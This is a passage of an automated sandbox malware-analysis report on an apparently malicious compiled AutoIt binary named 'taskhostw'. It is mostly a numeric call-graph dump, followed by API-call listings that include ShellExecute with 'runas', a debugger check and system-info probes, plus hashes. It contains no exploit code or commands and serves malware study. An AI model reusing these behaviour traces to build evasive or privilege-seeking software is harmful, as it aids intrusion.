50028->50026 50030 1d8ca8 __setmode __getptd_noexit 50029->50030 50032 1e10d6 50030->50032 50034 1e1255 50031->50034 50035 1e1713 GetLastError 50031->50035 50036 1d8c74 __wsopen_nolock __getptd_noexit 50032->50036 50037 1e11e4 50033->50037 50038 1e1230 50033->50038 50034->50035 50041 1e1225 50034->50041 50039 1e1213 50035->50039 50040 1e1720 50035->50040 50036->50016 50037->50038 50042 1e11ea ReadConsoleW 50037->50042 50038->50031 50045 1d8c87 __dosmaperr __getptd_noexit __getptd_noexit 50039->50045 50049 1e1219 50039->50049 50043 1d8ca8 __setmode __getptd_noexit 50040->50043 50041->50049 50051 1e128a 50041->50051 50053 1e14f7 50041->50053 50042->50041 50044 1e120d GetLastError 50042->50044 50046 1e1725 50043->50046 50044->50039 50045->50049 50047 1d8c74 __wsopen_nolock __getptd_noexit 50046->50047 50047->50049 50048 1d2ed5 _free HeapFree GetLastError __getptd_noexit 50048->50016 50049->50016 50049->50048 50050 1e1499 MultiByteToWideChar 50050->50044 50050->50049 50052 1e12f6 ReadFile 50051->50052 50060 1e1377 50051->50060 50056 1e1317 GetLastError 50052->50056 50064 1e1321 50052->50064 50053->50049 50057 1e15fd ReadFile 50053->50057 50054 1e1434 50061 1e13e4 50054->50061 50062 1e1485 __lseeki64_nolock 50054->50062 50055 1e1424 50058 1d8ca8 __setmode __getptd_noexit 50055->50058 50056->50064 50059 1e1620 GetLastError 50057->50059 50066 1e162e 50057->50066 50058->50049 50059->50066 50060->50049 50060->50054 50060->50055 50060->50061 50061->50050 50062->50050 50063 1e1379 __lseeki64_nolock 50063->50064 50064->50051 50064->50063 50065 1e16b1 __lseeki64_nolock 50065->50066 50066->50053 50066->50065 50068 1e0d32 50067->50068 50072 1e0d47 50067->50072 50069 1d8ca8 __setmode __getptd_noexit 50068->50069 50070 1e0d37 50069->50070 50071 1d8f36 __setmode 9 API calls 50070->50071 50079 1e0d42 50071->50079 50073 1e0d7c 50072->50073 50074 1e6164 __getbuf 17 API calls 50072->50074 50072->50079 50075 1d4856 __filbuf 10 API calls 50073->50075 50074->50073 50076 1e0d90 50075->50076 50077 1e0ec7 __read 36 API calls 50076->50077 50078 1e0d97 50077->50078 50078->50079 50080 1d4856 __filbuf 10 API calls 50078->50080 50079->49987 50081 1e0dba 50080->50081 50081->50079 50082 1d4856 __filbuf 10 API calls 50081->50082 50083 1e0dc6 50082->50083 50083->50079 50084 1d4856 __filbuf 10 API calls 50083->50084 50085 1e0dd3 50084->50085 50086 1d4856 __filbuf 10 API calls 50085->50086 50086->50079 50087->49983 50088->49986 50089->49987 50090->49983 50092 218f0a 50091->50092 50093 218eca 50091->50093 50092->50093 50100 218f91 50092->50100 50093->49939 50096 218ffc 50095->50096 50097 218feb 50095->50097 50096->49940 50098 1d49d3 43 API calls 50097->50098 50098->50096 50099->49939 50101 218fce 50100->50101 50102 218fbd 50100->50102 50101->50092 50104 1d49d3 50102->50104 50105 1d49df __setmode 50104->50105 50106 1d49fd 50105->50106 50107 1d4a15 50105->50107 50109 1d4a0d __setmode 50105->50109 50130 1d8ca8 __getptd_noexit 50106->50130 50110 1d6d8e __lock_file 2 API calls 50107->50110 50109->50101 50112 1d4a1b 50110->50112 50111 1d4a02 50131 1d8f36 9 API calls __setmode 50111->50131 50117 1d487a 50112->50117 50118 1d48a7 50117->50118 50121 1d4889 50117->50121 50132 1d4a4d LeaveCriticalSection _fprintf 50118->50132 50119 1d4897 50120 1d8ca8 __setmode __getptd_noexit 50119->50120 50122 1d489c 50120->50122 50121->50118 50121->50119 50123 1d48c1 50121->50123 50124 1d8f36 __setmode 9 API calls 50122->50124 50123->50118 50125 1daf9e __flsbuf 39 API calls 50123->50125 50126 1d490a _memmove 50123->50126 50127 1d4bad __flush 31 API calls 50123->50127 50128 1d4856 __filbuf 10 API calls 50123->50128 50129 1dda06 __write 31 API calls 50123->50129 50124->50118 50125->50123 50126->50123 50127->50123 50128->50123 50129->50123 50130->50111 50131->50109 50132->50109 50134 1d54b9 50133->50134 50137 1d54cd 50133->50137 50185 1d8ca8 __getptd_noexit 50134->50185 50136 1d54c9 50136->49959 50137->50136 50151 1d4bad 50137->50151 50138 1d54be 50186 1d8f36 9 API calls __setmode 50138->50186 50144 1d4856 __filbuf 10 API calls 50145 1d54e7 50144->50145 50161 1e0b82 50145->50161 50147 1d54ed 50147->50136 50148 1d2ed5 _free 3 API calls 50147->50148 50148->50136 50149->49954 50150->49959 50152 1d4bc0 50151->50152 50156 1d4be4 50151->50156 50153 1d4856 __filbuf 10 API calls 50152->50153 50152->50156 50154 1d4bdd 50153->50154 50187 1dda06 50154->50187 50157 1e0cf7 50156->50157 50158 1d54e1 50157->50158 50159 1e0d04 50157->50159 50158->50144 50159->50158 50160 1d2ed5 _free 3 API calls 50159->50160 50160->50158 50162 1e0b8e __setmode 50161->50162 50163 1e0b9b 50162->50163 50164 1e0bb2 50162->50164 50289 1d8c74 __getptd_noexit 50163->50289 50166 1e0c3d 50164->50166 50169 1e0bc2 50164->50169 50294 1d8c74 __getptd_noexit 50166->50294 50167 1e0ba0 50290 1d8ca8 __getptd_noexit 50167->50290 50170 1e0bea ___lock_fhandle 50169->50170 50171 1e0be0 50169->50171 50175 1e0c0e 50170->50175 50176 1e0c03 50170->50176 50291 1d8c74 __getptd_noexit 50171->50291 50173 1e0be5 50295 1d8ca8 __getptd_noexit 50173->50295 50292 1d8ca8 __getptd_noexit 50175->50292 50280 1e0c5d 50176->50280 50177 1e0ba7 __setmode 50177->50147 50181 1e0c49 50296 1d8f36 9 API calls __setmode 50181->50296 50182 1e0c09 50293 1e0c35 __unlock_fhandle 50182->50293 50185->50138 50186->50136 50188 1dda12 __setmode 50187->50188 50189 1dda1f 50188->50189 50190 1dda36 50188->50190 50272 1d8c74 __getptd_noexit 50189->50272 50191 1ddad5 50190->50191 50193 1dda4a 50190->50193 50277 1d8c74 __getptd_noexit 50191->50277 50196 1dda68 50193->50196 50197 1dda72 ___lock_fhandle 50193->50197 50195 1dda24 50273 1d8ca8 __getptd_noexit 50195->50273 50274 1d8c74 __getptd_noexit 50196->50274 50201 1dda9e 50197->50201 50202 1dda8b 50197->50202 50200 1dda6d 50278 1d8ca8 __getptd_noexit 50200->50278 50275 1d8ca8 __getptd_noexit 50201->50275 50211 1ddaf5 50202->50211 50206 1ddae1 50279 1d8f36 9 API calls __setmode 50206->50279 50207 1ddaa3 50276 1d8c74 __getptd_noexit 50207->50276 50209 1dda2b __setmode 50209->50156 50212 1ddb02 50211->50212 50213 1ddb41 50212->50213 50214 1ddb60 50212->50214 50243 1ddb36 50212->50243 50216 1d8c74 __wsopen_nolock __getptd_noexit 50213->50216 50218 1ddbb8 50214->50218 50219 1ddb9c 50214->50219 50215 1dc776 __NMSG_WRITE IsProcessorFeaturePresent ___raise_securityfailure 50217 1de356 50215->50217 50220 1ddb46 50216->50220 50217->50209 50222 1ddbc5 __lseeki64_nolock 50218->50222 50229 1ddbd4 50218->50229 50221 1d8c74 __wsopen_nolock __getptd_noexit 50219->50221 50223 1d8ca8 __setmode __getptd_noexit 50220->50223 50224 1ddba1 50221->50224 50222->50229 50225 1ddb4d 50223->50225 50226 1d8ca8 __setmode __getptd_noexit 50224->50226 50227 1d8f36 __setmode 9 API calls 50225->50227 50230 1ddba8 50226->50230 50227->50243 50228 1ddf38 50232 1de2cb WriteFile 50228->50232 50233 1ddf56 50228->50233 50229->50228 50236 1ddc0b GetConsoleMode 50229->50236 50231 1d8f36 __setmode 9 API calls 50230->50231 50231->50243 50234 1ddf2b GetLastError 50232->50234 50245 1ddef8 50232->50245 50235 1de07a 50233->50235 50241 1ddf6c 50233->50241 50234->50245 50237 1de16f 50235->50237 50238 1de085 50235->50238 50236->50228 50239 1ddc4a 50236->50239 50248 1de304 50237->50248 50249 1de1e4 WideCharToMultiByte 50237->50249 50238->50248 50252 1de0ea WriteFile 50238->50252 50239->50228 50242 1ddc5a GetConsoleCP 50239->50242 50240 1ddfdb WriteFile 50240->50234 50251 1de018 50240->50251 50241->50240 50241->50248 50242->50248 50269 1ddc89 50242->50269 50243->50215 50244 1d8ca8 __setmode __getptd_noexit 50246 1de332 50244->50246 50245->50243 50247 1de058 50245->50247 50245->50248 50253 1d8c74 __wsopen_nolock __getptd_noexit 50246->50253 50254 1de2fb 50247->50254 50255 1de063 50247->50255 50248->50243 50248->50244 50249->50234 50265 1de22b 50249->50265 50250 1de03c 50250->50245 50251->50241 50251->50250 50252->50234 50257 1de139 50252->50257 50253->50243 50256 1d8c87 __dosmaperr __getptd_noexit __getptd_noexit 50254->50256 50258 1d8ca8 __setmode __getptd_noexit 50255->50258 50256->50243 50257->50238 50257->50245 50257->50250 50259 1de068 50258->50259 50261 1d8c74 __wsopen_nolock __getptd_noexit 50259->50261 50260 1de233 WriteFile 50262 1de286 GetLastError 50260->50262 50260->50265 50261->50243 50262->50265 50263 1ddea4 __putwch_nolock 50263->50234 50263->50269 50264 1e643a 5 API calls __write_nolock 50264->50269 50265->50237 50265->50245 50265->50250 50265->50260 50266 1ddec1 __putwch_nolock 50266->50234 50266->50269 50267 1ddd72 WideCharToMultiByte 50267->50245 50268 1dddad WriteFile 50267->50268 50268->50234 50271 1ddddf 50268->50271 50269->50245 50269->50263 50269->50264 50269->50266 50269->50267 50270 1dde07 WriteFile 50270->50234 50270->50271 50271->50245 50271->50269 50271->50270 50272->50195 50273->50209 50274->50200 50275->50207 50276->50209 50277->50200 50278->50206 50279->50209 50281 1e0c6b 50280->50281 50282 1e0cc1 50281->50282 50287 1e0cab CloseHandle 50281->50287 50283 1e0cc3 __free_osfhnd 50282->50283 50284 1e0ce5 50283->50284 50285 1e0ceb 50283->50285 50297 1d8c87 __getptd_noexit __getptd_noexit __wsopen_nolock _free __setmode 50284->50297 50285->50182 50287->50282 50288 1e0cb7 GetLastError 50287->50288 50288->50283 50289->50167 50290->50177 50291->50173 50292->50182 50293->50177 50294->50173 50295->50181 50296->50177 50297->50285 50299 1e1ac0 50298->50299 50300 1d091e GetLongPathNameW 50299->50300 50301 1d0946 50300->50301 50301->49598 50303 1b4f3d 106 API calls 50302->50303 50304 1b69ef 50303->50304 50305 1ee38a 50304->50305 50306 1b4f3d 106 API calls 50304->50306 50307 219604 98 API calls 50305->50307 50308 1b6a03 50306->50308 50309 1ee39f 50307->50309 50308->50305 50310 1b6a0b 50308->50310 50311 1ee3a3 50309->50311 50312 1ee3c0 50309->50312 50314 1ee3ab 50310->50314 50315 1b6a17 50310->50315 50316 1b4faa 41 API calls 50311->50316 50313 1d0f36 19 API calls 50312->50313 50329 1ee405 50313->50329 50376 214339 6 API calls 50314->50376 50330 1b6bec 50315->50330 50316->50314 50319 1ee3b9 50319->50312 50320 1b3bcd 50320->49529 50320->49551 50321 1ee5b9 50322 1d2ed5 _free 3 API calls 50321->50322 50323 1ee5c1 50322->50323 50324 1b4faa 41 API calls 50323->50324 50326 1ee5ca 50324->50326 50325 1d2ed5 _free 3 API calls 50325->50326 50326->50325 50327 1b4faa 41 API calls 50326->50327 50327->50326 50329->50321 50329->50326 50377 1b6999 _wcscmp 50329->50377 50331 1b6c15 50330->50331 50336 1b6cc1 50330->50336 50332 1b5956 24 API calls 50331->50332 50333 1b6c4c 50332->50333 50334 1b77c7 19 API calls 50333->50334 50333->50336 50335 1b6c60 50334->50335 50378 1d0ad7 GetCurrentDirectoryW 50335->50378 50338 1b6ccf 50336->50338 50339 1ee7b9 50336->50339 50341 1b77c7 19 API calls 50338->50341 50345 1b4f3d 106 API calls 50339->50345 50340 1b6c6c 50342 1b77c7 19 API calls 50340->50342 50343 1b6cd8 50341->50343 50344 1b6c78 50342->50344 50346 1b77c7 19 API calls 50343->50346 50347 1b48ae GetFullPathNameW 50344->50347 50349 1ee7e1 50345->50349 50350 1b6ce1 50346->50350 50348 1b6c86 50347->50348 50354 1b5c4e 2 API calls 50348->50354 50352 219604 98 API calls 50349->50352 50362 1b6e6c 50349->50362 50351 1b46f9 20 API calls 50350->50351 50353 1b6cf8 50351->50353 50355 1ee7fd 50352->50355 50358 1b6d09 SetCurrentDirectoryW 50353->50358 50354->50336 50356 1ee826 50355->50356 50357 1ee805 50355->50357 50359 1b4faa 41 API calls 50356->50359 50360 1b4faa 41 API calls 50357->50360 50364 1b6d1c 50358->50364 50361 1ee82b 50359->50361 50360->50362 50363 1d0f36 19 API calls 50361->50363 50362->50320 50373 1ee85f 50363->50373 50365 1d0f36 19 API calls 50364->50365 50370 1b6d2f __NMSG_WRITE 50365->50370 50366 1b6e53 SetCurrentDirectoryW 50366->50362 50367 1eea99 50368 1d2ed5 _free 3 API calls 50367->50368 50368->50362 50369 1b6e47 50369->50366 50370->50369 50379 1b6a3c 136 API calls __NMSG_WRITE 50370->50379 50373->50367 50374 1eeaeb 50373->50374 50380 1b6999 _wcscmp 50373->50380 50375 1d2ed5 _free 3 API calls 50374->50375 50375->50362 50376->50319 50377->50329 50378->50340 50379->50370 50380->50373 50382 1b7009 50381->50382 50383 1b6ef5 50381->50383 50382->49605 50383->50382 50384 1d0f36 19 API calls 50383->50384 50386 1b6f1c 50384->50386 50385 1d0f36 19 API calls 50387 1b6f91 50385->50387 50386->50385 50387->50382 50388 1b63a0 21 API calls 50387->50388 50391 2068a9 19 API calls 50387->50391 50388->50387 50390->49607 50391->50387 50392->49614 50394 1be59d 50393->50394 50397 1be5b1 50393->50397 50476 1be060 180 API calls 50394->50476 50396 1be5a8 50396->49664 50397->50397 50399 1be835 50398->50399 50400 1f3e02 50399->50400 50402 1be89f 50399->50402 50411 1be8f9 50399->50411 50401 1ba000 180 API calls 50400->50401 50413 1beaba 50401->50413 50404 1b77c7 19 API calls 50402->50404 50402->50411 50403 1b77c7 19 API calls 50403->50411 50405 1f3e5d 50404->50405 50407 1d2ec0 __cinit 17 API calls 50405->50407 50406 1d2ec0 __cinit 17 API calls 50406->50411 50407->50411 50408 1f3e7f 50408->49664 50409 1b8620 27 API calls 50409->50413 50410 1ba000 180 API calls 50410->50413 50411->50403 50411->50406 50411->50408 50411->50413 50413->50409 50413->50410 50414 1b8ea0 19 API calls 50413->50414 50415 1bebd8 50413->50415 50477 1b80d7 20 API calls 50413->50477 50478 22c6d7 180 API calls 50413->50478 50414->50413 50415->49664 50418 1bf61a 50417->50418 50420 1bf65d 50417->50420 50421 1bf743 50418->50421 50479 1bf3f0 50418->50479 50420->50421 50422 1b4faa 41 API calls 50420->50422 50423 224570 180 API calls 50420->50423 50425 213c7b 3 API calls 50420->50425 50488 21cc06 50420->50488 50421->49664 50422->50421 50423->50421 50425->50421 50598 1b82e0 50426->50598 50428 1f4be6 50433 1bffac 50428->50433 50470 1c02c2 50428->50470 50612 22a3ee 21 API calls Mailbox 50428->50612 50429 1bff9e 50429->50428 50429->50433 50610 206a42 20 API calls 50429->50610 50430 1c0677 50435 1d0f36 19 API calls 50430->50435 50465 1c0167 Mailbox 50433->50465 50433->50470 50602 1b84dc 50433->50602 50434 1d0f36 19 API calls 50459 1bfe9d 50434->50459 50462 1c06a5 50435->50462 50436 1f4ba1 50611 206363 20 API calls 50436->50611 50438 1c06b6 50446 1d0f36 19 API calls 50438->50446 50439 1c07d9 _memmove 50439->50438 50441 1f4bc4 50443 1ba000 177 API calls 50441->50443 50442 1f4c0b Mailbox 50442->50433 50613 206a42 20 API calls 50442->50613 50443->50428 50448 1c06f1 50446->50448 50447 1d0f36 19 API calls 50450 1c0099 50447->50450 50449 1c0804 _memmove 50448->50449 50448->50465 50449->50465 50455 1c0b30 177 API calls 50450->50455 50450->50470 50451 1ba000 177 API calls 50451->50459 50452 1f4da6 50453 1ba000 177 API calls 50452->50453 50454 1f4de0 50453->50454 50461 1b8620 27 API calls 50454->50461 50454->50470 50458 1c0112 50455->50458 50456 1b8b13 27 API calls 50456->50465 50457 1c0146 50463 1b81a7 20 API calls 50457->50463 50457->50465 50458->50457 50458->50462 50458->50470 50459->50429 50459->50430 50459->50434 50459->50438 50459->50451 50459->50462 50459->50470 50460 1b88a0 26 API calls 50460->50465 50461->50470 50462->50438 50462->50439 50463->50465 50464 1d0f36 19 API calls 50464->50465 50465->50452 50465->50456 50465->50460 50465->50464 50466 1c046b _memmove 50465->50466 50467 1f4d75 50465->50467 50465->50470 50609 1b87c0 26 API calls 50465->50609 50466->50465 50469 1d0f36 19 API calls 50467->50469 50469->50452 50470->49664 50471->49618 50472->49664 50473->49664 50474->49664 50475->49655 50476->50396 50477->50413 50478->50413 50486 1bf41c 50479->50486 50487 1bf59a 50479->50487 50480 1bf533 50481 1bf543 50480->50481 50528 22a3ee 21 API calls Mailbox 50480->50528 50481->50420 50483 1d0f36 19 API calls 50483->50486 50484 1f4734 _memmove 50484->50486 50485 1ba000 179 API calls 50485->50486 50486->50480 50486->50483 50486->50484 50486->50485 50486->50487 50487->50420 50489 1b77c7 19 API calls 50488->50489 50490 21cc3b 50489->50490 50491 1b77c7 19 API calls 50490->50491 50492 21cc44 50491->50492 50493 21cc97 50492->50493 50494 21cd76 50492->50494 50527 21cda6 50492->50527 50497 1b81a7 20 API calls 50493->50497 50495 1b4f3d 106 API calls 50494->50495 50496 21cd8a 50495->50496 50498 21cda2 50496->50498 50501 1b4f3d 106 API calls 50496->50501 50500 21ccaf 50497->50500 50499 1b77c7 19 API calls 50498->50499 50498->50527 50502 21cdd7 50499->50502 50505 21ccc3 50500->50505 50513 21ccd3 50500->50513 50501->50498 50503 1b77c7 19 API calls 50502->50503 50504 21cde0 50503->50504 50506 1b77c7 19 API calls 50504->50506 50507 1b81a7 20 API calls 50505->50507 50508 21cde9 50506->50508 50507->50513 50510 1b77c7 19 API calls 50508->50510 50509 1b81a7 20 API calls 50511 21cd0e 50509->50511 50512 21cdf2 50510->50512 50589 214ad8 GetFileAttributesW 50511->50589 50515 1b46f9 20 API calls 50512->50515 50513->50509 50518 21ce1a 50515->50518 50516 21cd17 50516->50527 50517 1b81a7 20 API calls 50519 21ce6b 50517->50519 50518->50517 50529 2140b2 50519->50529 50521 21ceb2 50522 213c7b 3 API calls 50521->50522 50523 21cebc 50522->50523 50525 21ceed 50523->50525 50560 2191fe 50523->50560 50526 1b4faa 41 API calls 50525->50526 50526->50527 50527->50421 50528->50481 50530 2140ce 50529->50530 50531 2140e1 50530->50531 50532 2140d3 50530->50532 50534 1b77c7 19 API calls 50531->50534 50533 1b81a7 20 API calls 50532->50533 50559 2140dc 50533->50559 50535 2140e9 50534->50535 50536 1b77c7 19 API calls 50535->50536 50537 2140f1 50536->50537 50538 1b77c7 19 API calls 50537->50538 50539 2140fc 50538->50539 50540 1b77c7 19 API calls 50539->50540 50541 214104 50540->50541 50542 1b77c7 19 API calls 50541->50542 50543 21410c 50542->50543 50544 1b77c7 19 API calls 50543->50544 50545 214114 50544->50545 50546 1b77c7 19 API calls 50545->50546 50547 21411c 50546->50547 50548 1b77c7 19 API calls 50547->50548 50549 214124 50548->50549 50550 1b46f9 20 API calls 50549->50550 50551 21413b 50550->50551 50552 1b46f9 20 API calls 50551->50552 50553 214154 50552->50553 50554 1b81a7 20 API calls 50553->50554 50555 214198 50554->50555 50590 214264 20 API calls 50555->50590 50557 2141b3 50591 214264 20 API calls 50557->50591 50559->50521 50561 21920b 50560->50561 50562 1d0f36 19 API calls 50561->50562 50563 219268 50562->50563 50564 219290 _wcscmp 50563->50564 50565 2192b4 50564->50565 50569 21932d _wcscat 50564->50569 50573 21936a 50565->50573 50596 1d426e 10 API calls __wsplitpath_helper 50565->50596 50567 2192e2 _wcscat _wcscpy 50597 1d426e 10 API calls __wsplitpath_helper 50567->50597 50569->50573 50592 21998c GetTempPathW GetTempFileNameW 50569->50592 50571 219418 50572 1d53cb 87 API calls 50571->50572 50582 219429 50572->50582 50573->50525 50574 2194e3 50575 1d5516 40 API calls 50574->50575 50576 2194ee 50575->50576 50577 2194f4 DeleteFileW 50576->50577 50578 219508 50576->50578 50577->50573 50579 2195ae CopyFileW 50578->50579 50584 219512 _wcsncpy 50578->50584 50580 2195c4 DeleteFileW 50579->50580 50581 2195d6 DeleteFileW 50579->50581 50580->50573 50593 21994b CreateFileW 50581->50593 50582->50573 50582->50574 50585 1d49d3 43 API calls 50582->50585 50586 218baf 98 API calls 50584->50586 50585->50582 50587 219599 50586->50587 50587->50581 50588 21959d DeleteFileW 50587->50588 50588->50573 50589->50516 50590->50557 50591->50559 50592->50571 50594 219971 SetFileTime CloseHandle 50593->50594 50595 219987 50593->50595 50594->50595 50595->50573 50596->50567 50597->50569 50599 1b82ef 50598->50599 50601 1b830a 50598->50601 50600 1b82f7 CharUpperBuffW 50599->50600 50600->50601 50601->50459 50603 1b84ed 50602->50603 50604 1ef116 50602->50604 50605 1d0f36 19 API calls 50603->50605 50606 1b84f4 50605->50606 50607 1b8515 50606->50607 50614 1b8794 20 API calls 50606->50614 50607->50447 50607->50457 50607->50465 50609->50465 50610->50436 50611->50441 50612->50442 50613->50442 50614->50607 50615 1f0180 50616 1f0196 50615->50616 50617 1f0217 50616->50617 50619 1f01ac 50616->50619 50618 1bfe40 180 API calls 50617->50618 50621 1f020b 50618->50621 50619->50621 50622 2183f8 20 API calls 50619->50622 50622->50621

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B3B7A
                                                                  • IsDebuggerPresent.KERNEL32 ref: 001B3B8C
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,002752F8,002752E0,?,?), ref: 001B3BFD
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                    • Part of subcall function 001C0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001B3C26,002752F8,?,?,?), ref: 001C0ACE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001B3C81
                                                                  • MessageBoxA.USER32 ref: 001ED3EC
                                                                  • SetCurrentDirectoryW.KERNEL32(?,002752F8,?,?,?), ref: 001ED424
                                                                  • GetForegroundWindow.USER32 ref: 001ED4AA
                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 001ED4B1
                                                                    • Part of subcall function 001B3A58: GetSysColorBrush.USER32 ref: 001B3A62
                                                                    • Part of subcall function 001B3A58: LoadCursorW.USER32 ref: 001B3A71
                                                                    • Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3A88
                                                                    • Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3A9A
                                                                    • Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3AAC
                                                                    • Part of subcall function 001B3A58: LoadImageW.USER32 ref: 001B3AD2
                                                                    • Part of subcall function 001B3A58: RegisterClassExW.USER32(?), ref: 001B3B28
                                                                    • Part of subcall function 001B39E7: CreateWindowExW.USER32 ref: 001B3A15
                                                                    • Part of subcall function 001B39E7: CreateWindowExW.USER32 ref: 001B3A36
                                                                    • Part of subcall function 001B39E7: ShowWindow.USER32(00000000), ref: 001B3A4A
                                                                    • Part of subcall function 001B39E7: ShowWindow.USER32(00000000), ref: 001B3A53
                                                                    • Part of subcall function 001B43DB: _memset.LIBCMT ref: 001B4401
                                                                    • Part of subcall function 001B43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B44A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                  • String ID: This is a third-party compiled AutoIt script.$runas$%$
                                                                  • API String ID: 529118366-2487362596
                                                                  • Opcode ID: 91ac11d970c73f51697be6e7d0a6990db53701b984eb63e2d68fd3d6abc0353c
                                                                  • Instruction ID: 52abe9916203ab6f7f951a6dc8fc768c216ed46d88db56a50eccaf88ec8ae82c
                                                                  • Opcode Fuzzy Hash: 91ac11d970c73f51697be6e7d0a6990db53701b984eb63e2d68fd3d6abc0353c
                                                                  • Instruction Fuzzy Hash: 4651E830D04659AECF12EBF4FC4AEFDBB75AF55300B004166F865B21A2DBB05695CB21

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 979 1b4afe-1b4b5e call 1b77c7 GetVersionExW call 1b7d2c 984 1b4c69-1b4c6b 979->984 985 1b4b64 979->985 986 1edac0-1edacc 984->986 987 1b4b67-1b4b6c 985->987 988 1edacd-1edad1 986->988 989 1b4b72 987->989 990 1b4c70-1b4c71 987->990 992 1edad4-1edae0 988->992 993 1edad3 988->993 991 1b4b73-1b4baa call 1b7e8c call 1b7886 989->991 990->991 1001 1edbbd-1edbc0 991->1001 1002 1b4bb0-1b4bb1 991->1002 992->988 995 1edae2-1edae7 992->995 993->992 995->987 997 1edaed-1edaf4 995->997 997->986 999 1edaf6 997->999 1003 1edafb-1edafe 999->1003 1004 1edbd9-1edbdd 1001->1004 1005 1edbc2 1001->1005 1002->1003 1006 1b4bb7-1b4bc2 1002->1006 1007 1b4bf1-1b4c08 GetCurrentProcess IsWow64Process 1003->1007 1008 1edb04-1edb22 1003->1008 1013 1edbdf-1edbe8 1004->1013 1014 1edbc8-1edbd1 1004->1014 1009 1edbc5 1005->1009 1010 1b4bc8-1b4bca 1006->1010 1011 1edb43-1edb49 1006->1011 1015 1b4c0a 1007->1015 1016 1b4c0d-1b4c1e 1007->1016 1008->1007 1012 1edb28-1edb2e 1008->1012 1009->1014 1017 1edb5e-1edb6a 1010->1017 1018 1b4bd0-1b4bd3 1010->1018 1021 1edb4b-1edb4e 1011->1021 1022 1edb53-1edb59 1011->1022 1019 1edb38-1edb3e 1012->1019 1020 1edb30-1edb33 1012->1020 1013->1009 1023 1edbea-1edbed 1013->1023 1014->1004 1015->1016 1024 1b4c89-1b4c93 GetSystemInfo 1016->1024 1025 1b4c20-1b4c30 call 1b4c95 1016->1025 1029 1edb6c-1edb6f 1017->1029 1030 1edb74-1edb7a 1017->1030 1026 1b4bd9-1b4be8 1018->1026 1027 1edb8a-1edb8d 1018->1027 1019->1007 1020->1007 1021->1007 1022->1007 1023->1014 1028 1b4c56-1b4c66 1024->1028 1038 1b4c7d-1b4c87 GetSystemInfo 1025->1038 1039 1b4c32-1b4c3f call 1b4c95 1025->1039 1033 1edb7f-1edb85 1026->1033 1034 1b4bee 1026->1034 1027->1007 1032 1edb93-1edba8 1027->1032 1029->1007 1030->1007 1036 1edbaa-1edbad 1032->1036 1037 1edbb2-1edbb8 1032->1037 1033->1007 1034->1007 1036->1007 1037->1007 1041 1b4c47-1b4c4b 1038->1041 1044 1b4c41-1b4c45 GetNativeSystemInfo 1039->1044 1045 1b4c76-1b4c7b 1039->1045 1041->1028 1043 1b4c4d-1b4c50 FreeLibrary 1041->1043 1043->1028 1044->1041 1045->1044
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 001B4B2B
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  • GetCurrentProcess.KERNEL32(?,0023FAEC,00000000,00000000,?), ref: 001B4BF8
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 001B4BFF
                                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 001B4C45
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 001B4C50
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 001B4C81
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 001B4C8D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                  • String ID:
                                                                  • API String ID: 1986165174-0
                                                                  • Opcode ID: b6f044716540773103a1468fcbc8d2d548084852c24d38448495e211f3b98e14
                                                                  • Instruction ID: 61892d153d6be9ee387faea70224417b9b83ad6289a8e1501fc2c209843c9a6f
                                                                  • Opcode Fuzzy Hash: b6f044716540773103a1468fcbc8d2d548084852c24d38448495e211f3b98e14
                                                                  • Instruction Fuzzy Hash: 6791D53154ABC0DFC735DB68A5511EAFFE4AF2A300B488A9DD0CB93A42D321E908D759

                                                                  Control-flow Graph

                                                                  • Executed
